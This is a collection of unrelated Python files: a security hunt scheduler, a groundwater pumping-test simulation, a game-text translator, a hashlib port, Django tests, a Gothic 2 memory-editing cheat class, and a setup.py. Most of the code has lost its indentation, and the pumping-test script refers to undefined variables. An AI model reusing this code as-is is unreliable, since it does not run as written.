# first cancel any currently executing hunts
self.cancel_hunts()
self.clear_hunts()
self.load_hunts_from_config()
def start(self):
self.manager_control_event.clear()
self.load_hunts_from_config()
self.manager_thread = threading.Thread(target=self.loop, name=f"Hunt Manager {self.hunt_type}")
self.manager_thread.start()
self.update_manager_thread = threading.Thread(target=self.update_loop,
name=f"Hunt Manager Updater {self.hunt_type}")
self.update_manager_thread.start()
def debug(self):
self.manager_control_event.clear()
self.load_hunts_from_config()
self.execute()
def stop(self):
logging.info(f"stopping {self}")
self.manager_control_event.set()
self.wait_control_event.set()
for hunt in self.hunts:
try:
hunt.cancel()
except Exception as e:
logging.error("unable to cancel hunt {hunt}: {e}")
report_exception()
def wait(self, *args, **kwargs):
self.manager_control_event.wait(*args, **kwargs)
for hunt in self._hunts:
hunt.wait(*args, **kwargs)
if self.manager_thread:
self.manager_thread.join()
if self.update_manager_thread:
self.update_manager_thread.join()
def update_loop(self):
logging.debug(f"started update manager for {self}")
while not self.manager_control_event.is_set():
try:
self.manager_control_event.wait(timeout=self.update_frequency)
if not self.manager_control_event.is_set():
self.check_hunts()
except Exception as e:
logging.error(f"uncaught exception {e}")
report_exception()
logging.debug(f"stopped update manager for {self}")
def check_hunts(self):
"""Checks to see if any existing hunts have been modified, created or deleted."""
logging.debug("checking for hunt modifications")
trigger_reload = False
with self.hunt_lock:
# have any hunts been modified?
for hunt in self._hunts:
if hunt.is_modified:
logging.info(f"detected modification to {hunt}")
trigger_reload = True
# if any hunts failed to load last time, check to see if they were modified
for ini_path, mtime in self.failed_ini_files.items():
try:
if os.path.getmtime(ini_path) != mtime:
logging.info(f"detected modification to failed ini file {ini_path}")
trigger_reload = True
except Exception as e:
logging.error(f"unable to check failed ini file {ini_path}: {e}")
# are there any new hunts?
existing_ini_paths = set([hunt.ini_path for hunt in self._hunts])
for ini_path in self._list_hunt_ini():
if ( ini_path not in existing_ini_paths
and ini_path not in self.failed_ini_files
and ini_path not in self.skipped_ini_files ):
logging.info(f"detected new hunt ini {ini_path}")
trigger_reload = True
if trigger_reload:
self.signal_reload()
def loop(self):
logging.debug(f"started {self}")
while not self.manager_control_event.is_set():
try:
self.execute()
except Exception as e:
logging.error(f"uncaught exception {e}")
report_exception()
self.manager_control_event.wait(timeout=1)
if self.reload_hunts_flag:
self.reload_hunts()
logging.debug(f"stopped {self}")
def execute(self):
# the next one to run should be the first in our list
for hunt in self.hunts:
if not hunt.enabled:
continue
if hunt.ready:
self.execute_hunt(hunt)
continue
else:
# this one isn't ready so wait for this hunt to be ready
wait_time = (hunt.next_execution_time - local_time()).total_seconds()
logging.info(f"next hunt is {hunt} @ {hunt.next_execution_time} ({wait_time} seconds)")
self.wait_control_event.wait(wait_time)
self.wait_control_event.clear()
# if a hunt ends while we're waiting, wait_control_event will break out before wait_time seconds
# at this point, it's possible there's another hunt ready to execute before this one we're waiting on
# so no matter what, we break out so that we re-enter with a re-ordered list of hunts
return
def execute_hunt(self, hunt):
# are we ready to run another one of these types of hunts?
# NOTE this will BLOCK until a semaphore is ready OR this manager is shutting down
start_time = local_time()
hunt.semaphore = self.acquire_concurrency_lock()
if self.manager_control_event.is_set():
if hunt.semaphore is not None:
hunt.semaphore.release()
return
# keep track of how long it's taking to acquire the resource
if hunt.semaphore is not None:
self.record_semaphore_acquire_time(local_time() - start_time)
# start the execution of the hunt on a new thread
hunt_execution_thread = threading.Thread(target=self.execute_threaded_hunt,
args=(hunt,),
name=f"Hunt Execution {hunt}")
hunt_execution_thread.start()
# wait for the signal that the hunt has started
# this will block for a short time to ensure we don't wrap back around before the
# execution lock is acquired
hunt.startup_barrier.wait()
def execute_threaded_hunt(self, hunt):
        submissions = None
        try:
            submissions = hunt.execute_with_lock()
if submissions:
hunt.apply_suppression()
except Exception as e:
logging.error(f"uncaught exception: {e}")
report_exception()
finally:
self.release_concurrency_lock(hunt.semaphore)
# at this point this hunt has finished and is eligible to execute again
self.wait_control_event.set()
if submissions is not None:
for submission in submissions:
self.collector.queue_submission(submission)
def cancel_hunts(self):
"""Cancels all the currently executing hunts."""
for hunt in self._hunts: # order doesn't matter here
try:
if hunt.running:
logging.info("cancelling {hunt}")
hunt.cancel()
hunt.wait()
except Exception as e:
logging.info("unable to cancel {hunt}: {e}")
def set_concurrency_limit(self, limit):
"""Sets the concurrency limit for this type of hunt.
If limit is a string then it's considered to be the name of a network semaphore.
If limit is an integer then a local threading.Semaphore is used."""
try:
# if the limit value is an integer then it's a local semaphore
self.concurrency_type = CONCURRENCY_TYPE_LOCAL_SEMAPHORE
self.concurrency_semaphore = threading.Semaphore(int(limit))
logging.debug(f"concurrency limit for {self.hunt_type} set to local limit {limit}")
except ValueError:
# otherwise it's the name of a network semaphore
self.concurrency_type = CONCURRENCY_TYPE_NETWORK_SEMAPHORE
self.concurrency_semaphore = limit
logging.debug(f"concurrency limit for {self.hunt_type} set to "
f"network semaphore {self.concurrency_semaphore}")
def acquire_concurrency_lock(self):
"""Acquires a concurrency lock for this type of hunt if specified in the configuration for the hunt.
Returns a NetworkSemaphoreClient object if the concurrency_type is CONCURRENCY_TYPE_NETWORK_SEMAPHORE
or a reference to the threading.Semaphore object if concurrency_type is CONCURRENCY_TYPE_LOCAL_SEMAPHORE.
        Immediately returns None if no concurrency limit is in place for this type of hunt."""
if self.concurrency_type is None:
return None
result = None
start_time = local_time()
if self.concurrency_type == CONCURRENCY_TYPE_NETWORK_SEMAPHORE:
logging.debug(f"acquiring network concurrency semaphore {self.concurrency_semaphore} "
f"for hunt type {self.hunt_type}")
result = NetworkSemaphoreClient(cancel_request_callback=self.manager_control_event.is_set)
# make sure we cancel outstanding request
# when shutting down
result.acquire(self.concurrency_semaphore)
else:
logging.debug(f"acquiring local concurrency semaphore for hunt type {self.hunt_type}")
while not self.manager_control_event.is_set():
if self.concurrency_semaphore.acquire(blocking=True, timeout=0.1):
result = self.concurrency_semaphore
break
if result is not None:
total_seconds = (local_time() - start_time).total_seconds()
logging.debug(f"acquired concurrency semaphore for hunt type {self.hunt_type} in {total_seconds} seconds")
return result
def release_concurrency_lock(self, semaphore):
if semaphore is not None:
# both types of semaphores support this function call
logging.debug(f"releasing concurrency semaphore for hunt type {self.hunt_type}")
semaphore.release()
def load_hunts_from_config(self, hunt_filter=lambda hunt: True):
"""Loads the hunts from the configuration settings.
        Any ini files that fail to load are recorded in self.failed_ini_files.
        The hunt_filter parameter defines an optional lambda function that takes the Hunt object
        after it is loaded and returns True if the Hunt should be added, False otherwise.
This is useful for unit testing."""
for hunt_config in self._list_hunt_ini():
hunt = self.hunt_cls(manager=self)
logging.debug(f"loading hunt from {hunt_config}")
try:
hunt.load_from_ini(hunt_config)
if hunt_filter(hunt):
logging.debug(f"loaded {hunt} from {hunt_config}")
self.add_hunt(hunt)
else:
logging.debug(f"not loading {hunt} (hunt_filter returned False)")
except InvalidHuntTypeError as e:
self.skipped_ini_files.add(hunt_config)
logging.debug(f"skipping {hunt_config} for {self}: {e}")
continue
except Exception as e:
logging.error(f"unable to load hunt {hunt}: {e}")
report_exception()
try:
self.failed_ini_files[hunt_config] = os.path.getmtime(hunt_config)
except Exception as e:
logging.error(f"unable to get mtime for {hunt_config}: {e}")
# remember that we loaded the hunts from the configuration file
# this is used when we receive the signal to reload the hunts
self.hunts_loaded_from_config = True
def add_hunt(self, hunt):
assert isinstance(hunt, Hunt)
if hunt.type != self.hunt_type:
raise ValueError(f"hunt {hunt} has wrong type for {self.hunt_type}")
with self.hunt_lock:
# make sure this hunt doesn't already exist
for _hunt in self._hunts:
if _hunt.name == hunt.name:
raise KeyError(f"duplicate hunt {hunt.name}")
with open_hunt_db(self.hunt_type) as db:
c = db.cursor()
c.execute("INSERT OR IGNORE INTO hunt(hunt_name) VALUES ( ? )",
(hunt.name,))
db.commit()
self._hunts.append(hunt)
self.wait_control_event.set()
return hunt
def clear_hunts(self):
"""Removes all hunts."""
with self.hunt_lock:
with open_hunt_db(self.hunt_type) as db:
c = db.cursor()
c.execute("DELETE FROM hunt")
db.commit()
self._hunts = []
self.failed_ini_files = {}
self.skipped_ini_files = set()
self.wait_control_event.set()
def remove_hunt(self, hunt):
assert isinstance(hunt, Hunt)
with self.hunt_lock:
with open_hunt_db(hunt.type) as db:
c = db.cursor()
c.execute("DELETE FROM hunt WHERE hunt_name = ?",
(hunt.name,))
db.commit()
self._hunts.remove(hunt)
self.wait_control_event.set()
return hunt
def _list_hunt_ini(self):
"""Returns the list of ini files for hunts in self.rule_dirs."""
result = []
for rule_dir in self.rule_dirs:
rule_dir = abs_path(rule_dir)
if not os.path.isdir(rule_dir):
logging.error(f"rules directory {rule_dir} specified for {self} is not a directory")
continue
# load each .ini file found in this rules directory
logging.debug(f"searching {rule_dir} for hunt configurations")
for root, dirnames, filenames in os.walk(rule_dir):
for hunt_config in filenames:
if not hunt_config.endswith('.ini'):
continue
result.append(os.path.join(root, hunt_config))
return result
def record_semaphore_acquire_time(self, time_delta):
pass
class HunterCollector(Collector):
"""Manages and executes the hunts configured for the system."""
def __init__(self, *args, **kwargs):
super().__init__(service_config=saq.CONFIG['service_hunter'],
workload_type='hunter',
delete_files=True,
*args, **kwargs)
# each type of hunt is grouped and managed as a single unit
self.hunt_managers = {} # key = hunt_type, value = HuntManager
def reload_service(self, *args, **kwargs):
# pass along the SIGHUP to the hunt managers
super().reload_service(*args, **kwargs)
for manager in self.hunt_managers.values():
manager.signal_reload()
def debug_extended_collection(self):
self.extended_collection()
def load_hunt_managers(self):
"""Loads all configured hunt managers."""
for section_name in saq.CONFIG.sections():
if not section_name.startswith('hunt_type_'):
continue
section = saq.CONFIG[section_name]
if 'rule_dirs' not in section:
logging.error(f"config section {section} does not define rule_dirs")
continue
hunt_type = section_name[len('hunt_type_'):]
# make sure the class definition for this hunt is valid
module_name = section['module']
try:
_module = importlib.import_module(module_name)
except Exception as e:
logging.error(f"unable to import hunt module {module_name}: {e}")
continue
class_name = section['class']
try:
class_definition = getattr(_module, class_name)
except AttributeError as e:
logging.error("class {} does not exist in module {} in hunt {} config".format(
class_name, module_name, section))
continue
logging.debug(f"loading hunt manager for {hunt_type} class {class_definition}")
self.hunt_managers[hunt_type] = \
HuntManager(collector=self,
hunt_type=hunt_type,
rule_dirs=[_.strip() for _ in section['rule_dirs'].split(',')],
hunt_cls=class_definition,
concurrency_limit=section.get('concurrency_limit', fallback=None),
persistence_dir=self.persistence_dir,
update_frequency=self.service_config.getint('update_frequency'),
config = section)
def extended_collection(self):
# load each type of hunt from the configuration settings
self.load_hunt_managers()
logging.info("starting hunt managers...")
for manager in self.hunt_managers.values():
if self.service_is_debug:
manager.debug()
else:
manager.start()
if self.service_is_debug:
return
        # wait for this service to end
self.service_shutdown_event.wait()
# then stop the managers and wait for them to complete
for manager in self.hunt_managers.values():
manager.stop()
# then wait for the managers to complete
for manager in self.hunt_managers.values():
manager.wait()
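# A hedged sketch of the configuration section load_hunt_managers() scans for; the
# "example" suffix, module path, class name and rule directory below are hypothetical.
#   [hunt_type_example]
#   module = saq.collectors.example_hunter
#   class = ExampleNoopHunt
#   rule_dirs = hunts/example
#   concurrency_limit = 2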
|
# -*- coding: utf-8 -*-
import numpy as np
import welltestpy as wtp
import seaborn as sns
import pandas as pd
from anaflow import thiem
from ogs5py import specialrange
from matplotlib import pyplot as plt
#from gstools import SRF, Gaussian
from project import get_srf, ogs_2d, priors
from scipy.optimize import curve_fit
from pathlib import Path
# discretization and parameters
time = specialrange(0, 7200, 50, typ="cub")
rad = specialrange(0, 1000, 100, typ="cub")
angles = 32
#storage = 1e-3
T_const = 1e-5
rate = -1e-3
well_pos = rad[[0, 6, 11, 16, 21, 31, 41, 51, 61, 71, 81]]
pwell_pos = np.array([well_pos[0], 0.0])
owell_pos = well_pos[1:]
def run_ogs_project(model):
model.write_input()
success = model.run_model()
return success
def import_ogs_results(model, owell_name = "owell"):
point = model.readtec_point(pcs="GROUNDWATER_FLOW")
time = point[owell_name]["TIME"]
head = point[owell_name]["HEAD"]
return head, time
def campaign(model, T_field, owell_pos, pwell_pos, campaign_id = 1):
owell_pos = np.array(owell_pos)
field = wtp.FieldSite(name="Pump test data worth", coordinates=[0.0, 0.0])
campaign = wtp.Campaign(name="Transient-multi_" + str(campaign_id),
fieldsite = field)
campaign.add_well(name="pwell", radius=0.1, coordinates=(pwell_pos[0][0],
pwell_pos[0][1]))
campaign.add_well(name="owell_0", radius=0.1, coordinates=(owell_pos[0][0],
owell_pos[0][1]))
campaign.add_well(name="owell_1", radius=0.1, coordinates=(owell_pos[1][0],
owell_pos[1][1]))
campaign.add_well(name="owell_2", radius=0.1, coordinates=(owell_pos[2][0],
owell_pos[2][1]))
campaign.add_well(name="owell_3", radius=0.1, coordinates=(owell_pos[3][0],
owell_pos[3][1]))
campaign.add_well(name="owell_4", radius=0.1, coordinates=(owell_pos[4][0],
owell_pos[4][1]))
campaign.add_well(name="owell_5", radius=0.1, coordinates=(owell_pos[5][0],
owell_pos[5][1]))
campaign.add_well(name="owell_6", radius=0.1, coordinates=(owell_pos[6][0],
owell_pos[6][1]))
campaign.add_well(name="owell_7", radius=0.1, coordinates=(owell_pos[7][0],
owell_pos[7][1]))
campaign.add_well(name="owell_8", radius=0.1, coordinates=(owell_pos[8][0],
owell_pos[8][1]))
model = ogs_2d.write_ogs_project(model, owell_pos, T_field, time=time)
    success = run_ogs_project(model)
    heads, times = [], []
    for i in range(len(owell_pos)):
        head_i, time_i = import_ogs_results(model, owell_name="owell_{}".format(i))
        heads.append(head_i)
        times.append(time_i)
pumptest = wtp.PumpingTest(
name="pwell",
pumpingwell="pwell",
pumpingrate=rate,
description="Virtual transient 2d pumping test",
)
pumptest.add_transient_obs("owell_0", time_0, head_0)
pumptest.add_transient_obs("owell_1", time_1, head_1)
pumptest.add_transient_obs("owell_2", time_2, head_2)
pumptest.add_transient_obs("owell_3", time_3, head_3)
pumptest.add_transient_obs("owell_4", time_4, head_4)
pumptest.add_transient_obs("owell_5", time_5, head_5)
pumptest.add_transient_obs("owell_6", time_6, head_6)
pumptest.add_transient_obs("owell_7", time_7, head_7)
pumptest.add_transient_obs("owell_8", time_8, head_8)
campaign.addtests(pumptest)
campaign.save(path = "../data/")
if __name__ == '__main__':
model = ogs_2d.init_ogs_project(rad, task_root="pump_2d_trans_multi")
T_field = get_srf.get_srf_2d(model,
mean = -5, var = 1.1, len_scale = 100, seed = 1)
pwell_pos = [[0, 0]]
owell_pos = [[1, 0], [3, 2], [5, 2], [0, -10], [-30, 0],
[0, 50], [100, 0], [0, -250], [-500, 0]]
campaign(model, T_field, owell_pos, pwell_pos, campaign_id = 1)
pwell_pos = [[1, 0]]
owell_pos = [[0, 0], [3, 2], [5, 2], [0, -10], [-30, 0],
[0, 50], [100, 0], [0, -250], [-500, 0]]
campaign(model, T_field, owell_pos, pwell_pos, campaign_id = 2)
pwell_pos = [[3, 2]]
owell_pos = [[1, 0], [0, 0], [5, 2], [0, -10], [-30, 0],
[0, 50], [100, 0], [0, -250], [-500, 0]]
campaign(model, T_field, owell_pos, pwell_pos, campaign_id = 3)
pwell_pos = [[5, 2]]
owell_pos = [[1, 0], [3, 2], [0, 0], [0, -10], [-30, 0],
[0, 50], [100, 0], [0, -250], [-500, 0]]
campaign(model, T_field, owell_pos, pwell_pos, campaign_id = 4)
# print(head_0)
|
'''Dark Souls 3 msg XML processor'''
# pylint: disable=E1101,E1136,E1137,C0111,C0103
import asyncio
import codecs
import random
import re
import time
from dataclasses import dataclass, field
from functools import partial, reduce, wraps
from pathlib import Path
from typing import Dict, List, Optional, Tuple
from xml.etree import ElementTree
import paco
from . import data
from .translator import Translator
def wrapasync(func):
@wraps(func)
async def run(*args, loop=None, executor=None, **kwargs):
if loop is None:
loop = asyncio.get_event_loop()
pfunc = partial(func, *args, **kwargs)
return await loop.run_in_executor(executor, pfunc)
return run
def replacenth(string, sub, wanted, n):
where = [m.start() for m in re.finditer(sub, string)][n-1]
before = string[:where]
after = string[where:]
after = after.replace(sub, wanted, 1)
return before + after
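# For clarity, a small worked example of replacenth (hypothetical values):
# replacenth("a b c d", " ", "_", 2) replaces only the 2nd space -> "a b_c d".
# Note that sub is used both as a regex (re.finditer) and as a literal (str.replace),
# so it should be a pattern that matches itself literally, e.g. "\n".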
@dataclass
class Processor:
linecount: int = 0
charcount: int = 0
cachcount: int = 0
collcount: int = 0
textcache: Dict[str, str] = field(default_factory=dict)
rand: random.Random = random.Random()
def reset(self):
self.linecount = 0
self.charcount = 0
self.cachcount = 0
self.collcount = 0
self.textcache = {}
@staticmethod
    def getentries(path: Path) -> Tuple[Optional[ElementTree.ElementTree], Optional[List[ElementTree.Element]]]:
'''Get all entries from a msg xml'''
# exclude certain paths
skip = False
for e in data.ignorefiles_prefix:
if path.name.startswith(e):
skip = True
break
if skip:
return None, None
xml = ElementTree.parse(path)
root = xml.getroot()
        if root is None or len(root) == 0 or root.tag != 'fmg':
print('invalid fmg xml! no fmg root in', path)
return None, None
entries = root.find('entries')
        if entries is None or len(entries) == 0:
print('invalid fmg xml! no entries in', path)
return None, None
for entry in entries:
if not entry.text:
entry.text = ' '
# exclude certain texts
return (xml, list(filter(
lambda entry: \
entry.text not in data.ignoretext and \
not any(filter(lambda infix: infix in entry.text, data.ignoretext_infix)),
entries)))
@staticmethod
def savexml(xml: ElementTree, path: Path):
'''Save xml in the correct format'''
print()
print('writing ', path.relative_to(data.basepath))
xml.write(path, encoding='utf-8', xml_declaration=False)
# prepend bom and correct decl
with codecs.open(path, 'r', 'utf-8') as original:
ogdata = original.read()
with codecs.open(path, 'w', 'utf-8-sig') as modified:
modified.write('<?xml version="1.0" encoding="utf-8"?>\n' + ogdata)
@wrapasync
def __translate_entry(self, entry: ElementTree) -> int:
text = entry.text
# check if translation is already cached
if text in self.textcache.keys():
entry.text = self.textcache[text]
print('#', sep='', end='', flush=True)
return -1
# send text for translation
t = Translator(text, self.rand)
t.run(data.translate_steps)
# reorder into separate lines
original_text_lines = text.splitlines()
original_break = 0
for line in original_text_lines:
if line == '':
break
lsp = line.split('. ')
if not lsp:
if line[-1:] == '.':
original_break += 1
else:
original_break += len(lsp)
else:
original_break = 0
if len(original_text_lines) > 2:
res = '\n'.join(map(lambda r: r[:1].upper() + r[1:],\
t.string.replace('. ', '.\n', len(original_text_lines) - 1).splitlines()))
if original_break and res.count('\n') >= original_break:
res = replacenth(res, '\n', '\n\n', original_break)
if original_break > 1:
res = res.replace('.\n', '. ', 1)
# elif len(original_text_lines) > 1:
# res = t.string.replace('. ', '.\n', 1).replace('\n\n', '\n')
else:
res = t.string
# check if translation is already cached
        # in case the same text was sent for translation simultaneously
if text in self.textcache.keys():
entry.text = self.textcache[text]
print('!', sep='', end='', flush=True)
return -2
# store results
entry.text = res
self.textcache[text] = res
print('.', sep='', end='', flush=True)
return len(text)
async def translate(self, path: Path):
xml, entries = self.getentries(path)
if not xml:
print('skipping', path.relative_to(data.basepath))
return
if not entries:
print('skipping', path.relative_to(data.basepath))
self.savexml(xml, path)
return
print('processing', path.relative_to(data.basepath), 'with', len(entries), 'entries')
starttime = time.time()
        # shuffle because often the same entry appears multiple times in a row
# and we want to minimize concurrency collisions
entries_shuffled = list(entries)
random.shuffle(entries_shuffled)
results = await paco.map(self.__translate_entry, entries_shuffled, limit=32)
linecount = reduce(lambda a, v: a+1, filter(lambda v: v > 0, results), 0)
charcount = reduce(lambda a, v: a+v, filter(lambda v: v > 0, results), 0)
cachcount = reduce(lambda a, v: a+1, filter(lambda v: v == -1, results), 0)
collcount = reduce(lambda a, v: a+1, filter(lambda v: v == -2, results), 0)
self.linecount += linecount
self.charcount += charcount
self.cachcount += cachcount
self.collcount += collcount
self.savexml(xml, path)
endtime = time.time()
print('processed %d lines with %d chars in %.3f seconds (%d cached, %d collisions)' %\
(linecount, charcount, endtime - starttime, cachcount, collcount))
print()
def count(self, path: Path):
_, entries = self.getentries(path)
if not entries:
# print('\tskipping', path)
return
# print('\tcounting', path)
# starttime = time.time()
linecount = 0
charcount = 0
cachcount = 0
for entry in entries:
text = entry.text
if not text in self.textcache.keys():
self.textcache[text] = 'c'
linecount += 1
charcount += len(text)
else:
cachcount += 1
self.linecount += linecount
self.charcount += charcount
self.cachcount += cachcount
# endtime = time.time()
# print('\tcounted %d unique lines with %d chars in %.3f seconds (%d cached)' %\
# (linecount, charcount, endtime - starttime, cachcount))
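# A hedged usage sketch (not part of the module); the glob pattern and event-loop
# handling below are assumptions about how the surrounding package drives Processor.
#   proc = Processor()
#   for path in sorted(data.basepath.glob('**/*.xml')):
#       proc.count(path)
#   print(proc.linecount, 'unique lines /', proc.charcount, 'chars to translate')
#   # the actual translation is asynchronous:
#   # asyncio.get_event_loop().run_until_complete(proc.translate(path))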
|
# The MIT License (MIT)
#
# Copyright (c) 2017 Paul Sokolovsky
# Modified by Brent Rubell for Adafruit Industries, 2019
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
`adafruit_hashlib`
================================================================================
Secure hashes and message digests
* Author(s): Paul Sokolovsky, Brent Rubell
Implementation Notes
--------------------
**Hardware:**
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
try:
import hashlib
except ImportError:
from adafruit_hashlib._sha256 import sha224, sha256
from adafruit_hashlib._sha512 import sha384, sha512
from adafruit_hashlib._sha1 import sha1
from adafruit_hashlib._md5 import md5
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_hashlib.git"
# FIPS secure hash algorithms supported by this library
ALGOS_AVAIL = ["sha1", "md5", "sha224", "sha256", "sha384", "sha512"]
def new(algo, data=b""):
"""Creates a new hashlib object.
:param str algo: Name of the desired algorithm.
:param str data: First parameter.
"""
try:
hash_object = globals()[algo]
return hash_object(data)
except KeyError:
raise ValueError(algo)
# NOTE: @property has no effect at module level, so expose this as a plain function
def algorithms_available():
"""Returns a list containing the names of the hash
algorithms that are available in this module.
"""
return ALGOS_AVAIL
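# A brief usage sketch (the message bytes are arbitrary): new() looks up the requested
# constructor by name and returns a hash object with the usual update()/hexdigest() API.
#   m = new("sha256", b"CircuitPython")
#   print(m.hexdigest())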
|
from django.test import TestCase
from django.contrib.auth.models import User
from datetime import datetime
from .models import Task, Project
# Create your tests here.
def create_test_user():
return User.objects.create_user(username='User', email='mail@example.com', password='password')
class TestModels(TestCase):
def setUp(self):
self.user = create_test_user()
self.project = Project.objects.create(name='Project #1', user=self.user)
self.object = Task.objects.create(content='Task #1', deadline=datetime.now(), project=self.project)
def test_task_str(self):
self.assertEqual(self.object.__str__(), 'Task #1')
def test_project_str(self):
self.assertEqual(self.project.__str__(), 'Project #1')
class TestAngularView(TestCase):
def setUp(self):
self.user = create_test_user()
self.client.login(username='User', password='password')
def test_page_accessible(self):
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
class TestAPI(TestCase):
def setUp(self):
self.user = create_test_user()
self.client.login(username='User', password='password')
def test_task_view(self):
response = self.client.get('/api/tasks/')
self.assertEqual(response.status_code, 200)
def test_receive_only_for_current_user(self):
user2 = User.objects.create_user(username='user2', password='password')
project = Project.objects.create(name='project 2', user=user2)
Task.objects.create(content='task 1', project=project)
project2 = Project.objects.create(name='project 1', user=self.user)
Task.objects.create(content='task 4', project=project2)
response = self.client.get('/api/projects/')
self.assertContains(response, 'project 1')
self.assertNotContains(response, 'project 2')
def test_unauthorized(self):
self.client.logout()
response = self.client.get('/api/projects/')
self.assertEqual(response.status_code, 403)
def test_create_project_assign_user(self):
response = self.client.post('/api/projects/', {'name': 'Project 1'})
project = Project.objects.first()
#self.assertEqual(project.user, self.user)
|
from .constants import Constants
from donation_play.games.common_cheater import CommonCheater
class Gothic2Cheater(Constants, CommonCheater):
"""Class for working with Gothic cheats."""
def __init__(self, gothic_title, mem_editor=None):
"""Class initialization.
:param str gothic_title: game title.
        :param memory_editor.MemoryEditor mem_editor: instance of MemoryEditor.
"""
super().__init__(gothic_title)
self.mem_editor = mem_editor
def call_cheat(self, cheat_code):
"""Call cheat code to game console.
:param str cheat_code: cheat code.
"""
if not self.marvin_mode:
self.marvin_mode = True
code = "{console}{code}{code_end}{console}".format(console=self.CONSOLE_KEY, code=cheat_code,
code_end=self.ENTER_CHEAT_KEY)
self.send_cheat_code(cheat_code=code)
self.marvin_mode = False
def call_b_cheat(self, cheat_code):
"""Call B cheat code to game menu.
:param str cheat_code: cheat code.
"""
code = "{activator}{code}{activator}".format(activator=self.B_CHEATS, code=cheat_code)
self.send_cheat_code(cheat_code=code)
def cancel_b_cheats(self):
"""Cancel effect of B cheats."""
code = "{activator}{code}{activator}".format(activator=self.B_CHEATS, code=self.CANCEL_B_CHEATS)
self.send_cheat_code(cheat_code=code)
def spawn(self, npc_code):
"""Spawn NPC by code.
:param npc_code: NPCs code.
"""
cheat_code = "i{npc_code}".format(npc_code=npc_code)
self.call_cheat(cheat_code=cheat_code)
def heal(self):
"""Heal hero."""
cheat_code = "chf"
self.call_cheat(cheat_code=cheat_code)
def teleport(self, waypoint_code):
"""Teleport hero to waypoint.
:param waypoint_code: waypoint code
"""
cheat_code = "gw{waypoint_code}".format(waypoint_code=waypoint_code)
self.call_cheat(cheat_code=cheat_code)
def set_hour(self, hour):
"""Set in-game hours.
:param hour: 24-h format of hours.
"""
cheat_code = "seti{hour}".format(hour=hour)
self.call_cheat(cheat_code=cheat_code)
def set_2d_characters(self):
"""Set characters to 2D."""
cheat_code = "GROMMIT"
self.call_b_cheat(cheat_code=cheat_code)
def set_characters_fat(self):
"""Set characters fat."""
cheat_code = "GARFIELD"
self.call_b_cheat(cheat_code=cheat_code)
def set_speed_hack(self):
"""Enable speed hack."""
cheat_code = "SOUTHPARK"
self.call_b_cheat(cheat_code=cheat_code)
@property
def skill_points(self):
"""Hero's skill points."""
return self.mem_editor.get_value_from_pointer(*self.SKILL_POINTS_POINTER)
@skill_points.setter
def skill_points(self, value):
self.mem_editor.put_value_into_pointer(value, *self.SKILL_POINTS_POINTER)
@property
def strength(self):
"""Hero's strength."""
return self.mem_editor.get_value_from_pointer(*self.STRENGTH_POINTER)
@strength.setter
def strength(self, value):
self.mem_editor.put_value_into_pointer(value, *self.STRENGTH_POINTER)
@property
def agility(self):
"""Hero's agility."""
return self.mem_editor.get_value_from_pointer(*self.AGILITY_POINTER)
@agility.setter
def agility(self, value):
self.mem_editor.put_value_into_pointer(value, *self.AGILITY_POINTER)
@property
def marvin_mode(self):
"""Cheat mode - MARVIN mode."""
value = self.mem_editor.get_value_from_pointer(*self.MARVIN_POINTER)
return value == 1
@marvin_mode.setter
def marvin_mode(self, value):
self.mem_editor.put_value_into_pointer(value, *self.MARVIN_POINTER)
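# A hedged usage sketch; the game title and the MemoryEditor construction are
# hypothetical and depend on the surrounding donation_play package.
#   cheater = Gothic2Cheater("Gothic II", mem_editor=memory_editor.MemoryEditor(...))
#   cheater.heal()              # console cheat, wrapped in MARVIN mode
#   cheater.set_speed_hack()    # "B cheat" typed into the game menu
#   cheater.strength = 100      # direct memory write via STRENGTH_POINTER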
|
#!/usr/bin/env python
import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as f:
return f.read()
install_requires = []
# install_requires = ['requests >= 2.1.0']
# For SNI support in Python 2, must install the following packages
# if sys.version_info[0] == 2:
# install_requires.append('pyOpenSSL >= 0.14')
# install_requires.append('ndg-httpsclient >= 0.3.3')
# install_requires.append('pyasn1 >= 0.1.7')
setup(
name='mymodule',
packages=['mymodule'],
version='0.1',
description='Desc',
long_description=(read('README.rst') + '\n\n' +
read('HISTORY.rst') + '\n\n' +
read('AUTHORS.rst')),
url='http://github.com/rgooler/bootstrap-pip/',
license='MIT',
author='Ryan Gooler',
author_email='ryan.gooler@gmail.com',
py_modules=['mymodule'],
install_requires=install_requires,
include_package_data=True,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
# Copyright 2018 Red Hat Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from rally_openstack.scenarios.barbican import containers
from tests.unit import test
class BarbicanContainersTestCase(test.ScenarioTestCase):
def get_test_context(self):
